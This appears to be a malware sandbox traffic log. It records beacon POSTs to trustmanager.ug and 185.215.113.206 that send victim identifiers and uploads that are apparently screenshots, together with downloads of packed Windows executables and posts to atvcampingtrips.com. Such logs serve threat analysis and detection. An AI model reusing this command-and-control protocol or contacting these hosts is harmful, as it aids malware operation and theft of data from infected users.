Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----353468075b120103bc30cd6e79752b25Host: trustmanager.ugContent-Length: 94297Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----353468075b120103bc30cd6e79752b25Host: 185.215.113.206Content-Length: 94297Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----7a2f14e7abc747cf12a628c18a1a01a5Host: trustmanager.ugContent-Length: 98665Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----7a2f14e7abc747cf12a628c18a1a01a5Host: 185.215.113.206Content-Length: 98665Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6a7b7c2e2f57eb415274d4cc685dececHost: trustmanager.ugContent-Length: 98735Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----6a7b7c2e2f57eb415274d4cc685dececHost: 185.215.113.206Content-Length: 98735Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----7a2f14e7abc747cf12a628c18a1a01a5Host: trustmanager.ugContent-Length: 98665Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----7a2f14e7abc747cf12a628c18a1a01a5Host: 185.215.113.206Content-Length: 98665Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 Aug 2021 00:08:02 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Last-Modified: Mon, 23 Aug 2021 00:00:02 GMTETag: "4d600-5ca2eb2ea91e3"Accept-Ranges: bytesContent-Length: 316928Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 43 a9 49 62 07 c8 27 31 07 c8 27 31 07 c8 27 31 19 9a b2 31 16 c8 27 31 19 9a a4 31 6a c8 27 31 19 9a a3 31 31 c8 27 31 20 0e 5c 31 02 c8 27 31 07 c8 26 31 95 c8 27 31 19 9a ad 31 06 c8 27 31 19 9a b3 31 06 c8 27 31 19 9a b6 31 06 c8 27 31 52 69 63 68 07 c8 27 31 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 8f bd 47 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 de 01 00 00 98 fa 01 00 00 00 00 e0 22 00 00 00 10 00 00 00 f0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 fb 01 00 04 00 00 ac a3 05 00 03 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 6f 02 00 3c 00 00 00 00 30 fb 01 60 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 f2 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 65 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 01 00 10 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 dc 01 00 00 10 00 00 00 de 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2a 8b 00 00 00 f0 01 00 00 8c 00 00 00 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 ac f8 01 00 80 02 00 00 32 02 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 35 00 00 00 30 fb 01 00 36 00 00 00 a0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 Aug 2021 00:08:37 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Last-Modified: Sun, 22 Aug 2021 15:27:14 GMTETag: "3267b8-5ca27890360c8"Accept-Ranges: bytesContent-Length: 3303352Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 20 e2 00 b9 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 e0 02 00 00 fe 02 00 00 00 00 00 18 1b 50 00 00 20 00 00 00 00 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 7e 00 00 04 00 00 53 fb 32 00 03 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3a 40 06 00 50 00 00 00 00 00 7d 00 e3 71 01 00 00 00 00 00 00 00 00 00 b0 5a 32 00 08 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 20 20 20 20 20 00 e0 02 00 00 20 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 20 20 20 20 20 20 20 20 2a 10 00 00 00 00 03 00 00 08 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 f8 e9 02 00 00 20 03 00 00 98 00 00 00 86 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 20 20 20 20 20 20 20 20 0c 00 00 00 00 20 06 00 00 02 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 69 64 61 74 61 00 00 00 20 00 00 00 40 06 00 00 02 00 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 38 30 30 2d 38 35 30 20 00 72 01 00 00 60 06 00 00 72 01 00 00 22 02 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 74 68 65 6d 69 64 61 00 e0 47 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 e0 2e 62 6f 6f 74 00 00 00 00 3c 2d 00 00 c0 4f 00 00 3c 2d 00 00 94 03 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 72 73 72 63 00 00 00 e3 71 01 00 00 00 7d 00 00 72 01 00 00 d0 30 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 Aug 2021 00:08:46 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Last-Modified: Mon, 23 Aug 2021 00:00:02 GMTETag: "46e00-5ca2eb2ee0897"Accept-Ranges: bytesContent-Length: 290304Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 43 a9 49 62 07 c8 27 31 07 c8 27 31 07 c8 27 31 19 9a b2 31 16 c8 27 31 19 9a a4 31 6a c8 27 31 19 9a a3 31 31 c8 27 31 20 0e 5c 31 02 c8 27 31 07 c8 26 31 95 c8 27 31 19 9a ad 31 06 c8 27 31 19 9a b3 31 06 c8 27 31 19 9a b6 31 06 c8 27 31 52 69 63 68 07 c8 27 31 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 9c 64 be 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 de 01 00 00 32 fa 01 00 00 00 00 e0 22 00 00 00 10 00 00 00 f0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 fb 01 00 04 00 00 32 52 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 6f 02 00 3c 00 00 00 00 d0 fa 01 60 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 f2 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 65 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 01 00 10 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 dc 01 00 00 10 00 00 00 de 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 1a 8b 00 00 00 f0 01 00 00 8c 00 00 00 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 45 f8 01 00 80 02 00 00 ca 01 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 35 00 00 00 d0 fa 01 00 36 00 00 00 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 Aug 2021 00:09:13 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16Last-Modified: Mon, 23 Aug 2021 00:00:02 GMTETag: "65400-5ca2eb2eaf38a"Accept-Ranges: bytesContent-Length: 414720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 43 a9 49 62 07 c8 27 31 07 c8 27 31 07 c8 27 31 19 9a b2 31 16 c8 27 31 19 9a a4 31 6a c8 27 31 19 9a a3 31 31 c8 27 31 20 0e 5c 31 02 c8 27 31 07 c8 26 31 95 c8 27 31 19 9a ad 31 06 c8 27 31 19 9a b3 31 06 c8 27 31 19 9a b6 31 06 c8 27 31 52 69 63 68 07 c8 27 31 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 8b ab be 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 de 01 00 00 18 fc 01 00 00 00 00 e0 22 00 00 00 10 00 00 00 f0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 fc 01 00 04 00 00 30 8b 06 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 6f 02 00 3c 00 00 00 00 b0 fc 01 60 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 f2 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 65 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 01 00 10 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 dc 01 00 00 10 00 00 00 de 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 2a 8b 00 00 00 f0 01 00 00 8c 00 00 00 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 2b fa 01 00 80 02 00 00 b0 03 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 35 00 00 00 b0 fc 01 00 36 00 00 00 1e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://atvcampingtrips.com/upload/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: atvcampingtrips.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://atvcampingtrips.com/upload/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: atvcampingtrips.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://atvcampingtrips.com/upload/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: atvcampingtrips.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://atvcampingtrips.com/upload/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: atvcampingtrips.com
